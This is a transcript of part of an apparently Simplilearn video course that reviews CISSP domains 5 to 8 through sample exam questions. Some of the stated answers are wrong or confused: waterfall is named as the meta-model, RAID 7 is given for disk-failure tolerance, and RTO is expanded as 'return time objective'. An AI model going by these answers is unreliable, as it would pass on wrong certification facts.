maximum allowable downtime is if the biometric measure fails and if nobody is getting access to any of the resources, to what level or to what extent would my business be able to tolerate such an outage? Here the correct answer is the false acceptance rate, because if an unauthorized person gets access to my devices, that's the worst case scenario. If the biometric system is down and nobody's getting access, that may still be acceptable rather than having an unauthorized person getting access to very sensitive data. False rejection rate is also detrimental to the organization. However, it is not as bad as having a false acceptance rate introduced in the organization. The second question, which are the two major factors to measure biometric performance? Again, the question from the previous one, FAR, false acceptance rate, and FRR, false rejection rate, or FSE and ERR, IER and FAR, FRR and GIC. They don't actually relate. So the correct answer here is FAR, false acceptance rate, and false rejection rate. So these are the two major factors. False rejection rate may still be a little bit acceptable, but a false acceptance rate is not tolerable at all. Next question. A commercial application for steganography that is used to identify documents or verify their authenticity is either a digital checksum, an MD5 hash, a digital signature, or a watermark. Now here the keywords matter. We are talking about steganography, so suddenly people start thinking about hiding data within data. And then if you just isolate the words identify documents or verify their authenticity, we basically directly go to a digital signature, because that's what we utilize for a non-repudiation. However, what the question refers to is an application for steganography. Steganography is hiding some element which would be visible only to known people. We can utilize steganography to benefit ourselves or our organization by using it to identify the authenticity of a document. So if I am going to print out a document, maybe a watermark on the document which is not visible to the naked eye, but when I want to validate the document, I would search for that particular watermark. And that is the correct answer for this particular question. So that's what domain 5 is all about. Alright, let's look at domain number 6, which is security assessment and testing. Now this domain is all about assessments, auditing strategies, and testing. So from this domain, what you're going to take away is talking about internal audits, external audits, third-party audits, and the security control testing, strategizing about how we implement a vulnerability management system, a program within the organization that is repeatable, consistent, and measurable, can be tied up with other management programs like patch management, incident management, and anything and everything that requires a vulnerability assessment, like even change management. If something is going to change in an organization, you can have a vulnerability assessment done before you want to even think about allowing it or disallowing that change. Similarly, with penetration testing to validate the vulnerabilities that you've identified, log reviews, having a SIEM tool that will help you analyze or create a pattern analysis of what's happening within the infrastructure, what's happening within the organization from a security perspective. Then you're talking about collecting security process data, account management. When we say account management, identity and access management life cycle. So onboarding of an employee, offboarding of an employee, the lateral movements of an employee in an organization when they're getting promoted or they are transferred in from one department to another, right? So all of these would come under security assessment and testing to see how those policies are functioning, to analyze the effectiveness of those policies, thus the requirement for conducting vulnerability assessment and penetration tests. So let's look at a few questions on this domain. And let's start off with the first one. Which of the following ways requires the involvement of an information security analyst? So out of these 4 options, a systems requirements definition, system design, program development, or program testing, during which phase would you involve a security analyst? Now for this, we first need to identify why we require a security analyst. What is the job requirement? What is the activity that is going to be conducted by a security analyst, right? So in this scenario, the correct answer is program testing. In the program development phase, we won't need an analyst. We would need a program manager and architects who can develop a particular program, who can give it some semblance of what needs to be achieved. In the system design, it would be again an architect who's going to develop that system. In the systems requirements definition, again, so in the systems requirements definition, it's a requirement gathering about what you need to adhere to, what is going to be the baseline that you're going to create. So from these 4 options, you need to identify where would you place a security analyst, right? In the exam, it's the most probable answer that you're looking for. It's not the most idealistic answer, right? So from these 4 options, security analyst would most likely be involved in the program testing phase rather than any other phase. The second question, which of the following techniques is generally not used for monitoring purposes? Now, when you say monitoring, what is monitoring? Monitoring is looking into logs, activities, anything and everything that has already happened. So you're reacting to something that has already happened. And which of these following techniques is not used for monitoring? So you're collecting logs, you're analyzing those logs, what would be not be utilized? A penetration test, intrusion detection, violation processing, or countermeasures testing, right? Now, when you're monitoring, you would monitor a penetration test to analyze if the test was successful or not. Intrusion detection, that's the first input that you look at for analysis. Violation processing, anything is violated, any processes, any policies, you analyze them and you monitor them, thus you come to know that this has happened. In countermeasures testing, there's basically a test of the effectiveness of the countermeasures that are already implemented. At that point in time, you may not be monitoring these. The software program that acts on behalf of a user in their absence to carry out operations is known as an agent, worm, applet, or a browser. So, a program that acts on behalf of a user in their absence to carry out operations is either an agent, an applet, or a worm, or a browser. A browser is nothing but a software that allows you to surf the internet. A worm is a malicious application that would be more of a nuisance value than anything else. An applet is something that allows you interconnectivity. An agent is something that can be automated, used for automated tasks, and can run those tasks in the absence of a particular user. So if you look at these questions, understanding what each and every word means, understanding and highlighting the keywords in the question itself, and then analyzing the scenario that you are placed in, and then identifying the most appropriate answer for that particular question. That is how you want to approach a CISSP exam. Looking at the next domain number 7, and that's security operations. Let's look at what security operations has for us. Now, in security operations, you're looking at a SOC, a security operations center. So your regular vulnerability management, incident management, problem management, change management, placing controls, analyzing all that information. So probably having an SIEM tool, configuring the SIEM tool, collecting all those data. So identifying event sources. What are event sources? When I have an SIEM implemented, I am not going to expect the SIEM to automatically start collecting data all by itself. And then again, I don't expect the SIEM tool to understand what kind of data it needs to collect. So for me, in a security operations center, after I have installed an SIEM tool, I first need to configure it to identify which devices I want to monitor, from which devices I want to collect that information, and where do I want to store it. Once I have all that information in place, after that, I'm going to analyze that data to identify if anything has been incorrectly going on, or is there any security incident that has happened, and those would be raised as incidences, and that would be sent to the SOC team for analysis and then an incident response, right? Similarly, intrusion detection and prevention logs would be utilized to identify something that may have been missed by the IDS IPS itself. You're going to place controls for investigations, like administrative controls, which would be policies that you have made. Then you've got criminal laws. So if something bad has happened that can be described as a crime based on the law of that land, how you're going to deal with it. Civil laws, regulatory laws, and industry standards. Regulatory laws would be, for example, GDPR in the European Union, right? A civil law would be where there is no criminal activity that has happened, but let's say there's a breach of contract between two organizations and the civil lawsuit has been filed against an organization for a breach of service level agreements. Regulatory would be the GDPR Act, where you have to report to a regulatory body, and if there are any flaws, you could be fined. Industry standards, ISO 27001, PCI DSS, and so on and so forth. So when you're looking at these requirements for investigation, all of these would have prescribed how you're going to handle that investigation. If it is a criminal investigation, an organization by itself doesn't have the right to investigate. They have to go to a law enforcement agency and there is a procedure to follow. In case of a civil lawsuit, there are lawyers who would deal with this kind of activity, send out notices to the other party, then go to a court of law to file a lawsuit over there. In GDPR, there are timelines on how you're going to report a breach or how you're going to report an incident and so on and so forth. So in the security operations, you're creating a security operations center in alignment with all of these 5 requirements. You're going to look at logging and monitoring activities, having that SIEM tool, which will identify those devices that you want to monitor, collect relevant information that is prescribed based on all those 5 investigation types that we just discussed. Then you're looking at when you're looking at identification of assets, you go back to your asset inventory, asset register, you look at all the assets that you have, and then you make your strategy and plan how you want to collect those logs, right? And then this module will deal about how do you want to handle identity and access management, privilege account management, service level agreements, and so on and so forth. So this basically is the day-to-day business activity of an organization from a security perspective. So you are there to identify incidents. As a CISP, you won't be executing this, but you would be creating policies revolving all of these aspects. So this is what you need to consider. This is what you need to strategize upon. And this is what you want to advise the organization to what needs to be in place to be more effective from a security perspective. Let's look at the few questions from this domain. How does a subject get access to an object in a multi-level security policy? Now, first we need to understand what a multi-level security policy is. We need to understand what a subject is and what an object is. Let's look at the options first. The subject sensitivity label must dominate the object sensitivity label. The subject sensitivity label subordinates the object sensitivity label. The subject sensitivity label is subordinated by the object sensitivity label. And to repeat the sensitivity tags again and again, the subject sensitivity label is dominated by the object sensitivity label. Too much sensitivity in a single slide. However, you can see that this just confuses the person of what they're trying to read. Not only you missing what keywords are, so people normally focus on a keyword called multi-level security policy and start getting confused in that, while we do disregard what a subject and an object is. Right? So a subject and an object is a relationship that is created between identity and access management, subject being the user, object being the resource that needs to be accessed by that particular user. After which comes a multi-level security policy, which is basically the access control matrix that you have created between these multiple objects and multiple subjects. So, for example, in this domain, you would also talk about theoretical models for access management, including lattice-based approach, where the sensitivity labels come into the picture. You would talk about Clark-Wilson model, you will talk about Bell-LaPadula model, and a few other models, right? All of them theoretical in nature, which can then, based on other implementations, be implemented in a real-time scenario. So all that understanding comes into the picture, and then you need to identify how those sensitivity labels in a lattice-based approach could allow you to create those labels for your subjects and objects, and then the identity and access management tool would become the verification factor where it identifies the labels for the subject and the object, and based on those labels, they allow or disallow connectivity or allow connections to happen. Now here the correct answer is that the subject sensitivity label must dominate the object's sensitivity label. So the user should have a sensitivity label that allows them access to the object which has an equivalent sensitivity label. So understanding those models becomes very much important, not only from an exams perspective, but when you're creating a policy, you basically are going to use these terminologies and you're going to create a policy around this. Moving on, the second question, managers of which department are ideal for the development of information security policy for an organization? Business operation, information technology, purchase, or human resources? Now, managers of which department are ideal for development of information security policy for an organization? And when we say information security policy, we would obviously assume that is the IT department who's going to deal with it, and it's the information technology in this case. But that's incorrect. It is the business operation. Why? Because right from the first domain, so we would be taught in the training for CISSP that security needs to enhance the business functionality, not the other way around. So we are in the business, or we are in the function of conducting a business which would offer services, and those services that are being offered, the business activity that has been conducted, should be supplemented by security, so those business activities could be conducted in a secure manner. At no point in time is security going to be a deterrent to business. The only reason for anything to become a deterrent to business is the legality of it. If a business is illegal, it will not happen, or it should not happen. However, if the business activity is legal, then security should not stop that activity from happening. Security should be implemented in such a way that the business activity is strengthened. There is security embedded within it, secure by design, and then the business activity goes on. So even if you're a chief information security officer or a security manager, and you go and talk with the board of directors or the steering committee, as the terms you will come across in this training, you will understand that it's these people who would define how the business is going to work, what kind of business activity you're going to do, and then you provide the example. And I'll give you an example here. Let's say I'm an online retailer and I want to sell goods online, which is legal. I'm selling all legal goods. Now I want security team to come in, and they would help me to secure the function of being an online e-tailer, if you will. My security team is not going to come and tell me of not to go into that business or stop some services because they may be insecure, right? The security team's requirement is that if I want to sell goods online, they need to now create an architecture of devices, of clouds, of whatever is required to make it secure. So thus, the managers of business operations will always be the ideal department for the development of information security policies. They decide what the business is going to happen, and then the security team just complements it by adding the security to it. For example, just going on with this, a website is launched with HTTP. The security team comes into the picture and says data in motion needs security, so we're going to convert it into HTTPS. And at no point in time are they going to say HTTP is vulnerable, so we are not going to do this. We'd rather become a wholesale shop or something like that. And I'm just giving an example. And rather than me just rambling on, let's move on to the next question. Question 3, installing malicious software on the system to allow future backdoor access leads to violation of what integrity? Does it violate the data integrity, system, user, or network? Now, malicious software on a system to allow future backdoor access. So what are we doing here? We are basically installing a software or an application on a particular system which allows a hacker a backdoor access to the system. So this would violate the integrity of the system itself, right? The data would be compromised, but the data would be compromised because the system got compromised. A user doesn't matter because a backdoor is a backdoor entry where you can get access without even logging in as a user. And a network is just a way of communication at this point in time, but the essence being that system got infected, and through that infection, you got access to whatever was on that particular system. Now, that's domain number 7. Domain number 8, which is the last domain in the CISSP exam, is software development security, SDLC or SSDLC, Secure Software Development Life Cycle, right? That's what is discussed in this domain. Let's go back to the CISSP guide and see what this domain would consist of. So, software development security. Now you can see software development life cycles coming in. So they're going to talk about different life cycles like waterfall model. They're going to talk about agile. They're going to talk about modified waterfall. This module also will talk about DevSecOps, DevOps, and anything and everything that would be there with the software development life cycle. Now, when we say software development life cycle, the essence of a SISP is to add another S to the SDLC. The SDLC stands for Software Development Lifecycle. The SISP adds one more S, the Secure Software Development Lifecycle. So, as with everything, secure by design, which means security needs to be integrated at every phase of the life cycle, and it should not be bolted on. For example, a waterfall model talks about how the software is going to be developed and how it is going to be published or released at the end of the life cycle. At no point in time does it talk about security. Thus, security architect at that point in time would come into the picture and decide what are the requirements of the software, what are the security vulnerabilities or the risks that they see. So threat modeling would happen, and all those things need to be introduced right from the inception. So if there are developers or if there is a business requirement for an application, let's go back to the previous example. I'm an e-tailer. So to become an e-tailer, not do I only need a website, I will need a web application for that functionality to be given out. So I need to develop that application. In a regular lifecycle model, I develop that application and then go into security where I do a VAPT on that application, find out that there are disastrous results, and then I go back and start coding again, which is not a good scenario. So I have hired a CISP who will then come into the picture during the SDLC and at the inception itself when businessmen are talking about how the business is going to happen. At that point in time, the CISP will come in and start with a threat modeling exercise saying, you know what, let's talk about what are the risks this application is going to face. You're going to handle a lot of payment information because people need to pay for the products, right? So credit cards, you're going to be involved. There's a database, so SQL injection attacks. So these are the threats that we are looking at. And now a threat modeling exercise would be followed by a risk assessment. Then would be looked at by an impact analysis. And then based on that, you will prioritize those risks. You will then educate your developers to use secure coding practices. At the same time, security testing would be done to see how the application is being evolved. And then by the time that the software development lifecycle comes to an end, you would have a secure software which had security by design integrated since the inception rather than having bolted on. Now, this is the ideal scenario that you're looking for. The expense and the budgeting, that's where the balance of capital investments and time to market and all that comes into the picture. But for the training, we will always be in an ideal scenario. We'll always have enough time, enough resources, monetary and human. And the exam basically looks at a very ideal scenario in which you got just about everything. You just need to make the correct decision. At no point in time are you going to think that if I start doing a particular strategy, it is going to cost me a lot of money, so I don't want to do that. That's the real world scenario. In the real world, you look at the costs, you look at the timelines, deadlines, and then you take a informed decision of how much you want to invest in what. In the ideal world, for the CISP exam or the CISSP exam, there are no limitations. You are looking at the most correct way of doing those things, and thus you identify those requirements, and that's how you answer the exam. So you're looking at the security software environments that you require, configuration management, auditing and logging of changes, security impact of acquired software. Now, in this scenario, we talked about developing a software. What if I purchase a third-party software and I introduce it into my organization? Now, this software, when integrated, how is it going to impact my current security controls, impact my current identity access management, my networking, my other applications, my communications? So that's something that you want to assess as well, right? So let's go for the questions. Question 1, in which of the following RAID level the drive array continues to operate even if any disk fails? Now, in the actual exam, they are not going to be very technical. It's a managerial exam, so they may not ask you these kind of questions, but the knowledge is still required. So you need to know that there is something called RAID, the different levels of RAID, because you might want to use that as a solution in a particular thing. How do you want to implement RAID and all of those? That's not the knowledge that we want. But in this scenario, RAID level 7 is the ideal answer. Question 2, which of the following steps can be utilized or can be used to protect an organization against the failure of a critical software firm? Now, basically, what does this talk about? This talks about disaster recovery, or this talks about business continuity. For example, there's a failure of some sort. When there is something that fails, what does it do? It interrupts the business. So the moment a business interruption happens, what should kick in? The business continuity plan. If the business continuity plan fails, then the disaster recovery plan kicks in. So if you look into it, as we go in, we might even come against terminologies like RTOs, RPOs, return time objective, and recovery point objective. And at that point in time, you want to look at how do we want to recover from a data loss? And thus, you will come across solutions. Now, of the 4 options, full backups, differential backups, and incremental backups. And the 4th one, software escrow agreement. What is the difference between these. A full backup is a complete backup of the entire data that you have taken. Now, it sounds easy, but in an organization, data could be terabytes, petabytes, and to do a complete backup might take days, weeks, or a lot of time, right? It's not just copying 1 megabyte from a hard disk to a USB drive and be done with the backup. So full backups may be possible, but not on a regular basis. So maybe you do a full backup every week, which means that at the end of the week, if the data loss happens, then you have lost the data for an entire week because the backup was last week. Thus, it's not a very good solution. And to complement that, we could use incremental backups and differential backups, right? So the training would include all of these definitions of what these backups are, what happens. And then the fourth option, software escrow agreement. What is that? Now, in a software development or a software lifecycle, if I've purchased a software from a third party, my biggest risk is not of me getting hacked or the software getting hacked. From a business continuity, the biggest risk is if the software provider goes bankrupt or is taken over by somebody else or stops supporting the software, then what? What am I to do? Because I may have invested millions of dollars, or reinvesting into a different product and migrating to a different product would be expensive, very costly, and may be very time consuming. So what do I do at that point in time? So there is an option for software escrow agreement. What does that mean? That the source code of that software is placed in an escrow, which means, let's say in a bank, where the bank will hold the source code in a secure manner, and the source code cannot be accessed or be modified either by the developing organization or the purchasing organization. So it just sits with the bank. If the developers go out of business or they stop supporting, at that point in time, the escrow can be opened and the purchaser, that's us in this case, can still get the source code. So now we can develop the software, or we can go into the source code, analyze, and save ourselves from a disaster, right? So these are the four options. Now here you're talking about a critical software firm that failed. You're not talking about data that failed. So the correct answer here is the software escrow agreement, right? Question number 3. Now here we come across the word development models. Which one of these is a meta model that incorporates several other software development models? Are we looking at waterfall, modified waterfall, spiral, or critical patch? Here the correct answer is a waterfall model.
And with that, we have come to the end of this video on cybersecurity full course. I hope it was informative and interesting. If you have any questions related to the topics that were covered in this video, please ask away in the comment section below. Our team will help you solve your queries. Thanks for watching, stay safe and keep learning.
Hi there, if you like this video, subscribe to the Simplilearn YouTube channel and click here to watch similar videos. To nerd up and get certified, click here.